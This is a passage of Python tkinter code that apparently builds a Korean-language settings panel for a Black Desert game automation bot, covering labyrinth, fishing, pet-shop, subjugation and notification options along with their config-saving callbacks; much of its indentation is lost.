combobox_list = [str(i) for i in range(0, 11)]
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_guild_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'].trace(
'w', lambda *args: self.callback_migung_open_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open')
)
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '공개',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_open'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'].trace(
'w', lambda *args: self.callback_migung_repeat_booleanvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat')
)
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '반복',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_repeat'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='미궁 목록')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "난이도"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'].trace(
'w', lambda *args: self.callback_migung_join_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join')
)
combobox_list = [str(i) for i in range(1, 9)]
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "단계 참여하고 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'].trace(
'w', lambda *args: self.callback_migung_join_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit')
)
combobox_list = [str(i) for i in range(10, 601, 5)]
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'] = 30
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'migung_join_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 매칭 대기 후 재신청"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_row = ttk.Frame(frame_head)
frame_label = ttk.LabelFrame(frame_row, text='낚시')
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'].trace(
'w', lambda *args: self.callback_naksi_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit')
)
combobox_list = [str(i) for i in range(60, 7201, 60)]
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'] = 600
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'naksi_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "초 동안 작업"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='말 가방에 넣기')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "옮길 아이템 갯수"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'].trace(
'w', lambda *args: self.callback_mal_bag_open_item_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit')
)
combobox_list = [str(i) for i in range(1, 11)]
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'mal_bag_open_item_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "개"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_row, text='가축상점')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = "일반 사료 구매 "
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'].trace(
'w', lambda *args: self.callback_pet_set_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set')
)
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set' not in self.configure.common_config[self.game_name]:
    self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'] = 100
combobox_list = ['10', '50', '100']
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_set'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "개씩"
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'].trace(
'w', lambda *args: self.callback_pet_number_stringvar(args, lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number')
)
if lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'] = 2
combobox_list = [str(i) for i in range(1, 100)]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'],
state = "readonly",
height = 10,
width = 3,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_WORK2 + 'pet_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = "회"
)
label.pack(side=tkinter.LEFT)
frame.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame_label.pack(side=tkinter.LEFT, anchor=tkinter.NW, padx=5, pady=5)
frame_row.pack(anchor=tkinter.W)
frame_head.pack(anchor=tkinter.W)
# +-----------------------------------------+
# |                                         |
# |      토벌 게시판 (subjugation board)      |
# |                                         |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['tobeol_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'].trace(
'w', lambda *args: self.callback_tobeol_custom_stringvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom')
)
if lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'] = False
s = ttk.Style()
s.configure('blue_checkbutton.TCheckbutton', foreground='blue')
check_box = ttk.Checkbutton(
master = frame,
text = '개별 설정 사용',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'custom'],
onvalue = True,
style = 'blue_checkbutton.TCheckbutton',
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'].trace(
'w', lambda *args: self.callback_tobeol_auto_update_booleanvar(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update')
)
if lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'] = True
s = ttk.Style()
s.configure('green_checkbutton.TCheckbutton', foreground='green')
check_box = ttk.Checkbutton(
master = frame,
text = '토벌 실패시 난이도 업데이트',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'auto_update'],
onvalue = True,
style = 'green_checkbutton.TCheckbutton',
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W, padx=10)
frame_row.pack(anchor=tkinter.W)
frame = ttk.Frame(frame_head)
frame.pack(pady=2)
frame_row_top = ttk.Frame(frame_head)
for i in range(len(LYBBlackDesert.tobeol_boss_list)):
frame_row = ttk.Frame(frame_row_top)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i)] = tkinter.BooleanVar(frame)
if lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i) not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i)] = True
check_box = ttk.Checkbutton(
master = frame,
text = "%2d. %s" % (i+1, self.preformat_cjk(LYBBlackDesert.tobeol_boss_list[i], 18)),
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i)],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
combobox_list = LYBBlackDesert.tobeol_rank_list
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)] = tkinter.StringVar(frame)
# equivalent to the original 17-branch if/elif chain: route each index to its
# named callback (callback_tobeol_process_0_booleanvar .. _16_, defined below);
# idx is bound per iteration via a default argument to avoid late binding
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(i)].trace(
'w', lambda *args, idx=i: getattr(self, 'callback_tobeol_process_%d_booleanvar' % idx)(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'process' + str(idx))
)
self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)].trace(
'w', lambda *args, idx=i: getattr(self, 'callback_tobeol_rank_%d_stringvar' % idx)(args, lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(idx))
)
if i == 9:
    # after the tenth boss, pack the first column and start a second one
    frame_row_top.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=10)
    frame_row_top = ttk.Frame(frame_head)
if lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i) not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)],
state = "readonly",
height = 11,
width = 4,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_TOBEOL + 'rank' + str(i)])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
label = ttk.Label(
master = frame,
text = ' 단계 하락'
)
label.pack(side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_row.pack(anchor=tkinter.W)
frame_row_top.pack(anchor=tkinter.NW, side=tkinter.LEFT, padx=10)
frame_head.pack(anchor=tkinter.W, padx=5, pady=5)
# +-----------------------------------------+
# |                                         |
# |     알림 설정 (notification settings)     |
# |                                         |
# +-----------------------------------------+
frame_head = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_row = ttk.Frame(frame_head)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'].trace(
'w', lambda *args: self.callback_notify_urewanryo_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo')
)
if lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '의뢰 완료',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'urewanryo'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'].trace(
'w', lambda *args: self.callback_notify_world_boss_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss')
)
if lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '월드 보스 클리어',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'world_boss'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'].trace(
'w', lambda *args: self.callback_notify_migung_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung')
)
if lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '미궁 클리어',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'migung'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'].trace(
'w', lambda *args: self.callback_notify_tobeol_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol')
)
if lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '토벌 클리어',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'tobeol'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame = ttk.Frame(frame_row)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'].trace(
'w', lambda *args: self.callback_notify_character_death_stringvar(args, lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death')
)
if lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death' not in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'] = True
check_box = ttk.Checkbutton(
master = frame,
text = '캐릭터 필드 사망',
variable = self.option_dic[lybconstant.LYB_DO_STRING_BD_NOTIFY + 'character_death'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(side=tkinter.LEFT, anchor=tkinter.W)
frame_row.pack(anchor=tkinter.W)
frame_head.pack(anchor=tkinter.W, padx=5, pady=5)
# ------
self.option_dic['option_note'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.inner_frame_dic['options'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.set_game_option()
def get_option_text(self, text):
return self.preformat_cjk(text, lybconstant.LYB_BD_OPTION_WIDTH) + ':'
def get_item_rank_text(self, text):
return self.preformat_cjk(text, 6)
def callback_tobeol_process_0_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_1_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_2_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_3_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_4_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_5_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_6_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_7_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_8_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_9_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_10_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_11_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_12_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_13_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_14_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_15_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_process_16_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_3_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_4_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_5_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_6_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_7_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_8_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_9_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_10_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_11_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_12_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_13_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_14_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_15_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_rank_16_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_auto_update_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_tobeol_custom_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_mal_bag_open_item_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_pet_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_pet_set_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_chegwang_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_chejip_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_beolmok_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_muge_percentage_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_search_complete_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_jeoljeon_mode_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_insahagi_page_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_reqeat_quest_random_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_world_boss_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_naksi_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_gecheok_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_join_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_friend_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_guild_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_friend_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_guild_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_open_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_repeat_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_migung_join_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_7_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_6_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_5_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_4_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_3_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_place_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_7_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_6_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_5_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_4_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_3_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_2_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_1_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_0_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_tukbat_count_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_tukbat_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chejip_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_money_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_blackstone_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_youngji_chuksa_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_daejeon_count_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_daejeon_giveup_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_daejeon_match_stringvar(self, args, option_name):
